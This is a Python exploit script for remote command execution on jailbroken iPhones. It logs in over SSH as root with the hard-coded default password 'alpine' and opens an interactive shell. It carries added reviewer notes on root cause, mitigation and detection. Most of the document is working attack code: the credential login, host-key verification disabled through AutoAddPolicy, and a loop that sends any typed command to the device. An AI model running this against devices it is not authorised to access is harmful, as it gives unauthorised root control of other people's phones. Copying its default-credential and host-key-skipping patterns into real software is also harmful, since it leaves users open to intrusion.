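#!/usr/bin/python
# This software opens a simple shell where you can type commands to send and works without Metasploit
# Exploit Title: Apple iPhone iOS Default SSH Remote Command Execution exploit
# Exploit Author: D35m0nd142
# Date: 17/02/2013
# Vendor Homepage: http://www.apple.com
# Screenshot: http://imageshack.us/photo/my-images/713/iphoneexploit.png/
# Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premium - Backbox
#
# Reviewer notes
# --------------
# Root cause: this is not a memory-corruption or protocol flaw. The script
# logs in over SSH as root with the password hard-coded below, so it only
# works against a device that (a) runs an SSH server and (b) still has the
# default root password. Stock iOS does not expose an SSH server; in
# practice that means a jailbroken device with an SSH package installed.
#
# Mitigation: change the root password (and that of any other login-capable
# account) right after installing an SSH server, prefer key-based
# authentication, and remove or disable the SSH server when it is not needed.
#
# Detection: successful root SSH logins to a handset from unexpected peers,
# and inbound TCP/22 connections to mobile devices on networks where that is
# not expected.
#
# Written for Python 2 (raw_input); print calls use the single-argument
# parenthesised form, which behaves the same on Python 2.

import paramiko
import sys,time
import os


def usage():
    """Exit with a usage message unless exactly one argument (the IP) is given."""
    if len(sys.argv) != 2:
        print("Usage: python exploit.py <iphone_ip> \n")
        sys.exit(1)


def exploit(iphoneip,cmd):
    """Run one command on the device over SSH and print its stdout lines.

    A new SSH connection is opened and closed for every command, so no
    shell state (working directory, environment) carries over between calls.

    Args:
        iphoneip: address of the device, passed to SSHClient.connect().
        cmd: command string passed to SSHClient.exec_command().

    Only stdout is printed; stderr is read by nobody, so failing commands
    show an empty list. Exceptions raised by paramiko propagate to the caller.
    """
    ssh = paramiko.SSHClient()
    # AutoAddPolicy accepts any host key without verification: the client
    # has no assurance about which host it is actually talking to.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(iphoneip,username='root',password='alpine')
        stdin, stdout, stderr = ssh.exec_command(cmd)
        resp = stdout.readlines()
        print(resp)
    finally:
        # Close the client even when connect/exec raises, so a failed
        # attempt does not leak the socket.
        ssh.close()


# Validate the command line before touching sys.argv[1]; the original read
# the argument first (and had the check commented out), so a missing
# argument produced an IndexError traceback instead of the usage text.
usage()
os.system("clear")
iphoneip = sys.argv[1]

print("==================================================================")
print("=     Apple iPhone iOS SSH Remote Command Execution exploit      =")
print("=                     Created by D35m0nd142                      =")
print("==================================================================\n")

time.sleep(1.3)

cmd = " "
while (cmd != "quit"):
    try:
        cmd = raw_input("shell:~# ")
        if cmd == "quit":
            # Leave the loop locally; the original also sent the literal
            # string "quit" to the device as a command before exiting.
            break
        exploit(iphoneip,cmd)
    except (KeyboardInterrupt, EOFError):
        # EOFError covers Ctrl-D / closed stdin, which the original left
        # unhandled.
        print("\nExiting . . \n")
        sys.exit(1)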